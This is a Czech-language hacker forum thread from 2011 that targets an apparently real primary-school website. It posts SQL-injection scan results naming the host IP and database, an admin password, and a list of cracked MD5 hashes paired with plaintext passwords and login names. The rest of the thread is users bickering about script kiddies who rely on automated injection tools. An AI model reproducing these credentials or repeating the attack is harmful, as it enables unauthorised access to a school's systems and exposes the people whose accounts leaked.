ZS svCaM

BugTrack

ZS svCaM#
A co by ste vedeli vysparat odtud?

[link]

Host IP: 212.5.221.31
Web Server: mod_antiloris/0.4
Keyword Found:           052
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 9
Injection type is String (')
Valid String Column is 6
Current DB: snv_portal_skoly1

(odpovědět)
halohalo | 87.106.252.*7.7.2011 11:53
re: ZS svCaM#
admin:uuc29

(odpovědět)
M3RRY | 217.117.216.*7.7.2011 12:56
re: ZS svCaM#
Mohl bys vysvetlit postup jak si na to dosel?
(odpovědět)
halohalo | 87.106.252.*7.7.2011 18:11
re: ZS svCaM#
copak? tohle uz ta vase m3g4 h4x4 aplikace nedokaze vydolovat? nebo ze bys vlastne ani nevedel jak tahle chyba funguje a jen si tak klikas abys byl velky h4ck3r a mohl machrovat pred kamosema kolik uz jsi toho h4xl? soom si vychovava armadu novych 0n3-click lam?
(odpovědět)
Shooogun | 193.200.150.*7.7.2011 18:35
re: ZS svCaM#
proc ma porad nekdo pocit, ze soom nekomu dela mamu? soom si nikoho nevychovava, je to komunitni web jako kazdy jiny...
(odpovědět)
Emkei | E-mail | Website | PGP7.7.2011 18:38
re: ZS svCaM#
ono celkově by chtělo, aby se v bug tracku lidé více rozepisovali nebo dávali hodnotné podklady pro danou zranitelnost - jinak to podle mně ztrácí smysl :)

Výpisů db vytažených přes např. havij dokáže i děcko napostovat stovky během jedné noci...
(odpovědět)
7.7.2011 23:28
re: ZS svCaM#
Podle meho to smysl neztraci, upozorni te, ze existuje zranitelny web s urcitou chybou a je na tobe, aby sis vyzkoysel jeji hledani. To je IMHO smysl bugtracku.

Kazdy se muze dale ptat a ostatni mu mohou pomahat.

U nekterych extra speku muze byt zajimavy i podrobny navod, ale jinak si myslim, ze to neni zadouci. Odradi to cast ultra mega haxoru, kteri si musi dokazat sve schopnoti smazanim a jinou destrukcni cinnosti.
(odpovědět)
yhy | 88.100.6.*8.7.2011 12:16
re: ZS svCaM#
Tak oukej, ale na netu je přeci dost literatury...
např. [link] nebo [link]
Jinak k programu Havij: je to dobrej program, ale strácí to takovej ten šmrnc... neni to ono, navíc si to stáhne nějaké děcko a pak jak už tu bylo řečeno s tim machruje... Ale myslim že to je každého věc...
(odpovědět)
M3RRY | 217.117.216.*8.7.2011 13:23
re: ZS svCaM#
Blind SQL injection was found at:
"[link]", using HTTP method GET. The injectable parameter is: "index".
This vulnerability was found in the requests with ids 281 to 282.


[link]


Data Base: snv_portal_skoly1

md5 hash:
21232f297a57a5a743894a0e4a801fc3 admin
0cc45c9b2fc35c72a5fae9a682d630e3 maja
ea2b2676c28c0db26d39331a336c6b92 start
c7d090718f4ae9f23a8a3ca48145333e 780830


(odpovědět)
sroub3k | E-mail11.7.2011 1:14
re: ZS svCaM#
Jestě zbyvající MD5 ..


b08d0dd433294a2d3d2ddb22d35ba667:webtest /login: admin
0cc45c9b2fc35c72a5fae9a682d630e3:maja /login: admin 3
ea2b2676c28c0db26d39331a336c6b92:start /login: mimoboy
47a9031d499ed5a0fb9da21aef850b86:futbal /login: admin
21232f297a57a5a743894a0e4a801fc3:admin /login: admin
c7d090718f4ae9f23a8a3ca48145333e:780830 /login: Jakubov
e6e6d8022437874a03744f84fd7d44dc:Jakubov /login: admin
5bb49fbab24f95fbb6ab01e29398f2d5:radmilka /login: admin
05b0a5b85cbbe8c95740ac224cb48166:uuc29 /login: admin
d8f19e810fb327bb274dd294daaa76e6: zombek /login: boro
2f34eb0c2804f738349778f59eb0458c: qayxdr /login: horin


jak vidno, tak "admin" docela často pod jiným heslem...
(odpovědět)
sroub3k | E-mail12.7.2011 10:58

Zpět
 
 
 

 
BBCode